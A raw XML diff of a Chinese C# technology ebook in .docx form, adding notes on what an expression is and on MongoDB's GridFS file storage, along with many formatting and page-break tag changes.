--- a/EBook/C#技术栈.docx
+++ b/EBook/C#技术栈.docx
@@ -869,6 +869,9 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1019,6 +1022,187 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:t>）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>什么是表达式？</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>表达式是由运算符和运算对象组成</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>单独的一个运算对象（常量</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>变量）也可以叫做表达式，这是最简答的表达式。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>eg</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>4,4+2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>c = 7+5,3&gt;5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>……</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1287,6 +1471,7 @@
           <w:sz w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>sealed密封类</w:t>
       </w:r>
     </w:p>
@@ -1368,7 +1553,6 @@
           <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">       把一个基类方法声明为virtual，就可以在任何类的派生类中重写该方法。也可以将属性声明为virtual</w:t>
       </w:r>
     </w:p>
@@ -2672,6 +2856,7 @@
           <w:szCs w:val="19"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>多播委托</w:t>
       </w:r>
       <w:r>
@@ -2776,7 +2961,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>泛型</w:t>
       </w:r>
       <w:r>
@@ -3818,6 +4002,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Linq to sql / Linq to DataSet / Linq to Object / Linq to Xml</w:t>
       </w:r>
     </w:p>
@@ -3834,7 +4019,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>概念：语言集成查询</w:t>
       </w:r>
       <w:r>
@@ -4815,6 +4999,7 @@
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
           <w:szCs w:val="21"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>第一个委托参数TSource表示数据源，返回值表示分组的关键字名称。</w:t>
       </w:r>
       <w:r>
@@ -5933,6 +6118,7 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>我们可以在</w:t>
       </w:r>
       <w:r>
@@ -6051,7 +6237,6 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>XmlAttribute</w:t>
       </w:r>
       <w:r>
@@ -7004,6 +7189,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>原生的</w:t>
       </w:r>
       <w:r>
@@ -7078,7 +7264,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>为了访问数据库，需要提供某些连接参数，如运行数据库的计算机和登记证书。使用</w:t>
       </w:r>
       <w:r>
@@ -8075,6 +8260,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>EF</w:t>
       </w:r>
     </w:p>
@@ -8155,7 +8341,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Nhibernate</w:t>
       </w:r>
       <w:r>
@@ -8863,6 +9048,7 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>string</w:t>
       </w:r>
       <w:r>
@@ -8947,7 +9133,6 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>async</w:t>
       </w:r>
       <w:r>
@@ -9801,7 +9986,14 @@
         <w:rPr>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>递归，说白了就是直接或者间接的调用自己的一种算法。它是把求解问题转化为规模较小的子问题，然后通过多次递归一直到可以得出结果的最小解，然后通过最小解逐层向上返回调用，最终得到整个问题的解。总之递归可以概括为一句话就是：</w:t>
+        <w:t>递归，说白了就是直接或者间接的调用自己的一种算法。它是把求解问题转化为规模较小的子问题，然后通过多次递归一直到可以得出结果的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>最小解，然后通过最小解逐层向上返回调用，最终得到整个问题的解。总之递归可以概括为一句话就是：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9887,7 +10079,6 @@
         <w:rPr>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t> </w:t>
       </w:r>
       <w:r>
@@ -10587,6 +10778,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>new QueryStringValueProviderFactory(),</w:t>
       </w:r>
     </w:p>
@@ -10705,7 +10897,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>元数据</w:t>
       </w:r>
     </w:p>
@@ -11551,6 +11742,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>RazorViewEngine</w:t>
       </w:r>
       <w:r>
@@ -11613,7 +11805,6 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>数据库技术</w:t>
       </w:r>
     </w:p>
@@ -12686,6 +12877,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Oracle</w:t>
       </w:r>
     </w:p>
@@ -12756,7 +12948,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>免费，功能一般，开源，相对不安全</w:t>
       </w:r>
       <w:r>
@@ -13971,6 +14162,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="32"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>关系运算符</w:t>
       </w:r>
     </w:p>
@@ -14040,7 +14232,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>大于</w:t>
       </w:r>
       <w:r>
@@ -15161,6 +15352,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>改值</w:t>
       </w:r>
       <w:r>
@@ -15208,7 +15400,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>无法修改时则添加</w:t>
       </w:r>
       <w:r>
@@ -16129,6 +16320,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>InsertOne</w:t>
       </w:r>
       <w:r>
@@ -16181,7 +16373,6 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="0070C0"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>读取</w:t>
       </w:r>
       <w:r>
@@ -17342,6 +17533,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>微服务</w:t>
       </w:r>
     </w:p>
@@ -17422,7 +17614,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Remote Procedure Call Protocol</w:t>
       </w:r>
       <w:r>
@@ -36446,7 +36637,7 @@
         <w:ind w:left="450"/>
         <w:rPr>
           <w:rStyle w:val="20"/>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorBidi"/>
           <w:color w:val="0070C0"/>
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
@@ -36508,17 +36699,17 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
           <w:color w:val="0070C0"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-          <w:color w:val="0070C0"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
         <w:t>2.数据契约</w:t>
       </w:r>
     </w:p>
@@ -36532,7 +36723,7 @@
         <w:ind w:left="450"/>
         <w:rPr>
           <w:rStyle w:val="20"/>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorBidi"/>
           <w:color w:val="0070C0"/>
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
@@ -36871,7 +37062,7 @@
         <w:ind w:left="450"/>
         <w:rPr>
           <w:rStyle w:val="20"/>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorBidi"/>
           <w:color w:val="0070C0"/>
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
@@ -36975,7 +37166,7 @@
         <w:ind w:left="450"/>
         <w:rPr>
           <w:rStyle w:val="20"/>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorBidi"/>
           <w:color w:val="0070C0"/>
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
@@ -37068,7 +37259,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
           <w:color w:val="0070C0"/>
           <w:szCs w:val="21"/>
         </w:rPr>
@@ -53550,7 +53741,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2C622B22-9C5B-4D98-B6A4-B4699FAA91FD}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{9C20B64E-E723-40C5-9EC1-8D22D43808EC}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/EBook/C#技术栈.docx
+++ b/EBook/C#技术栈.docx
@@ -869,9 +869,6 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:ind w:left="450"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1032,9 +1029,6 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:ind w:left="450"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -1046,7 +1040,6 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:sz w:val="24"/>
         </w:rPr>
@@ -1071,9 +1064,6 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:ind w:left="450"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16716,6 +16706,9 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16728,6 +16721,511 @@
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t xml:space="preserve"> Compound Index</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>分布式文件系统</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>MongoDB</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>内置一套文件系统名为</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>GridFS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>（</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Grid File System</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>我们可以使用它来存储大于</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>16M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>的文件。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>它具有多机器存储备份，可以突破一般文件系统对</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>的限制，分段存储，不像普通</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>file system</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>是整个存储的。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>这样读取大型文件时就不会占用大量的内存。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>支持多种驱动，如</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Java</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>C#</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>等</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>GridFS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>会将文件存储在两个</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Document</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>里：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ac"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="171"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>hunks</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>用来存储二进制数据</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ac"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="171"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>F</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>iles</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>用于存储基本文件信息</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>具体的命令我们可以参考以下链接：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId14" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+          </w:rPr>
+          <w:t>https://docs.mongodb.com/manual/reference/program/mongofiles/index.html</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>其中最简单的包括：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>存储文件：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">mongofiles </w:t>
+      </w:r>
+      <w:r>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">d </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
